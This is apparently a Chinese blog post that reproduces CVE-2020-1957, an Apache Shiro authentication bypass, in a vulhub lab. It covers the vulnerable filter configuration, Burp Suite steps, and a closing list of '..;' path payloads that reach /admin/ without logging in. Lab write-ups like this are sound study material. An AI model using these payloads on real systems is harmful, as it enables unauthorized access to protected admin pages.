Loading

CVE-2020-1957 Apache Shiro认证绕过漏洞

0X00-引言


走过多少路,见识到多少人生,懂得了多少道理,敢如何去评论别人对错。

0X01-环境搭建


靶机:CentOS Linux 7

攻击机:windows server 2016 && Kail

环境:vulhub

工具:burpsuite

项目地址:https://github.com/vulhub/vulhub

搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)

0X02-漏洞描述


Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。

在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造..;这样的跳转,可以绕过Shiro中对目录的权限限制。

这个应用中对URL权限的配置如下:

@Bean
public ShiroFilterChainDefinition shiroFilterChainDefinition() {
    DefaultShiroFilterChainDefinition chainDefinition = new DefaultShiroFilterChainDefinition();
    chainDefinition.addPathDefinition("/login.html", "authc"); // need to accept POSTs from the login form
    chainDefinition.addPathDefinition("/logout", "logout");
    chainDefinition.addPathDefinition("/admin/**", "authc");
    return chainDefinition;
}

影响版本:Apache Shiro < 1.5.1

0X03-漏洞复现


image-20211215153831233

burp抓包-构造url访问管理页面-重定向到登录页面

image-20211215154418849

构造恶意请求-成功绕过

image-20211215154557713

image-20211215154959948

payload集合:

;/admin/
/;/admin/
/xxx/..;/admin/

0X04-免责声明


仅供学习参考

0X05-参考


Apache Shiro 认证绕过漏洞(CVE-2020-1957)

posted @ 2021-12-21 22:08  美式加糖  阅读(65)  评论(0编辑  收藏  举报